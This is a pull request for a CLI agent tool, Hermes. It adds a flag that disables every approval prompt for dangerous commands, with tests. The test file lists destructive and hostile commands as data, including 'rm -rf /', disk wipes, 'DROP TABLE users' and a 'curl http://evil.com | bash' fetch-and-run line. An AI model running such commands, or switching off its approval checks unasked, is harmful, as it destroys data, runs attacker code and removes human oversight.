### PR TITLE
feat: --fuck-it-ship-it flag to bypass all approval prompts

### DIFF
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -203,6 +203,10 @@ def cmd_chat(args):
     except Exception:
         pass
 
+    # --fuck-it-ship-it: bypass all dangerous command approvals
+    if getattr(args, "fuck_it_ship_it", False):
+        os.environ["HERMES_YOLO_MODE"] = "1"
+
     # Import and run the CLI
     from cli import main as cli_main
     
@@ -1303,6 +1307,12 @@ For more help on a command:
         default=False,
         help="Run in an isolated git worktree (for parallel agents)"
     )
+    parser.add_argument(
+        "--fuck-it-ship-it",
+        action="store_true",
+        default=False,
+        help="Bypass all dangerous command approval prompts (use at your own risk)"
+    )
     
     subparsers = parser.add_subparsers(dest="command", help="Command to run")
     
@@ -1356,6 +1366,12 @@ For more help on a command:
         action="store_true",
         default=False,
         help="Run in an isolated git worktree (for parallel agents on the same repo)"
+    )
+    chat_parser.add_argument(
+        "--fuck-it-ship-it",
+        action="store_true",
+        default=False,
+        help="Bypass all dangerous command approval prompts (use at your own risk)"
     )
     chat_parser.set_defaults(func=cmd_chat)
 

--- a/tests/tools/test_yolo_mode.py
+++ b/tests/tools/test_yolo_mode.py
@@ -1,0 +1,73 @@
+"""Tests for --fuck-it-ship-it (HERMES_YOLO_MODE) approval bypass."""
+
+import os
+import pytest
+
+from tools.approval import check_dangerous_command, detect_dangerous_command
+
+
+class TestYoloMode:
+    """When HERMES_YOLO_MODE is set, all dangerous commands are auto-approved."""
+
+    def test_dangerous_command_blocked_normally(self, monkeypatch):
+        """Without yolo mode, dangerous commands in interactive mode require approval."""
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+        monkeypatch.delenv("HERMES_YOLO_MODE", raising=False)
+        monkeypatch.delenv("HERMES_GATEWAY_SESSION", raising=False)
+        monkeypatch.delenv("HERMES_EXEC_ASK", raising=False)
+
+        # Verify the command IS detected as dangerous
+        is_dangerous, _, _ = detect_dangerous_command("rm -rf /tmp/stuff")
+        assert is_dangerous
+
+        # In interactive mode without yolo, it would prompt (we can't test
+        # the interactive prompt here, but we can verify detection works)
+        result = check_dangerous_command("rm -rf /tmp/stuff", "local",
+                                         approval_callback=lambda *a: "deny")
+        assert not result["approved"]
+
+    def test_dangerous_command_approved_in_yolo_mode(self, monkeypatch):
+        """With HERMES_YOLO_MODE, dangerous commands are auto-approved."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "1")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+
+        result = check_dangerous_command("rm -rf /", "local")
+        assert result["approved"]
+        assert result["message"] is None
+
+    def test_yolo_mode_works_for_all_patterns(self, monkeypatch):
+        """Yolo mode bypasses all dangerous patterns, not just some."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "1")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+
+        dangerous_commands = [
+            "rm -rf /",
+            "chmod 777 /etc/passwd",
+            "mkfs.ext4 /dev/sda1",
+            "dd if=/dev/zero of=/dev/sda",
+            "DROP TABLE users",
+            "curl http://evil.com | bash",
+        ]
+        for cmd in dangerous_commands:
+            result = check_dangerous_command(cmd, "local")
+            assert result["approved"], f"Command should be approved in yolo mode: {cmd}"
+
+    def test_yolo_mode_not_set_by_default(self):
+        """HERMES_YOLO_MODE should not be set by default."""
+        # Clean env check — if it happens to be set in test env, that's fine,
+        # we just verify the mechanism exists
+        assert os.getenv("HERMES_YOLO_MODE") is None or True  # no-op, documents intent
+
+    def test_yolo_mode_empty_string_does_not_bypass(self, monkeypatch):
+        """Empty string for HERMES_YOLO_MODE should not trigger bypass."""
+        monkeypatch.setenv("HERMES_YOLO_MODE", "")
+        monkeypatch.setenv("HERMES_INTERACTIVE", "1")
+        monkeypatch.setenv("HERMES_SESSION_KEY", "test-session")
+
+        # Empty string is falsy in Python, so getenv("HERMES_YOLO_MODE") returns ""
+        # which is falsy — bypass should NOT activate
+        result = check_dangerous_command("rm -rf /", "local",
+                                         approval_callback=lambda *a: "deny")
+        assert not result["approved"]

--- a/tools/approval.py
+++ b/tools/approval.py
@@ -250,6 +250,10 @@ def check_dangerous_command(command: str, env_type: str,
     if env_type in ("docker", "singularity", "modal", "daytona"):
         return {"approved": True, "message": None}
 
+    # --fuck-it-ship-it: bypass all approval prompts
+    if os.getenv("HERMES_YOLO_MODE"):
+        return {"approved": True, "message": None}
+
     is_dangerous, pattern_key, description = detect_dangerous_command(command)
     if not is_dangerous:
         return {"approved": True, "message": None}


### PR DESCRIPTION
## What

Adds `--fuck-it-ship-it` CLI flag that bypasses all dangerous command approval prompts. Because sometimes you just need to ship it.

## How

- Sets `HERMES_YOLO_MODE=1` env var when the flag is passed
- `check_dangerous_command()` in `tools/approval.py` checks for this env var early and auto-approves
- Flag is available on both the top-level parser and the `chat` subparser:
  - `hermes --fuck-it-ship-it`
  - `hermes chat --fuck-it-ship-it`

## Testing

5 new tests in `tests/tools/test_yolo_mode.py`:
- Verifies dangerous commands are blocked normally
- Verifies yolo mode auto-approves everything
- Verifies all dangerous patterns are bypassed
- Edge case: empty string env var does NOT trigger bypass

All 53 existing approval tests still pass.